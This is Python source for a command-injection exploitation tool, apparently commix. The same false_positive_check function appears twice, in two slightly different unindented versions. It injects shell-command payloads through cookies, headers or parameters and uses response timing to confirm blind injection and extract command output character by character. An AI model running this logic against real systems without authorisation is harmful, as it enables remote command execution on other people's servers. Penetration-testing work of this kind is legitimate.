def false_positive_check(separator, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, randvcalc,
alter_shell):
found_chars = False
if menu.options.verbose:
sys.stdout.write("\n(*) Testing the reliability of used payload... ")
sys.stdout.flush()
for output_length in range(1, 3):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result_alter_shell(
separator, cmd, num_of_chars, ascii_char, delay,
http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result(separator, cmd,
num_of_chars, ascii_char,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") +
Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter,
payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(
url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter,
payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
output.append(ascii_char)
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
if str(output) == str(randvcalc):
return output
#eof
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell):
found_chars = False
if menu.options.verbose:
sys.stdout.write("\n(*) Testing the reliability of used payload... ")
sys.stdout.flush()
for output_length in range(1, 3):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
found_chars = True
break
if found_chars == True :
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
output.append(ascii_char)
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
if str(output) == str(randvcalc):
return output
#eof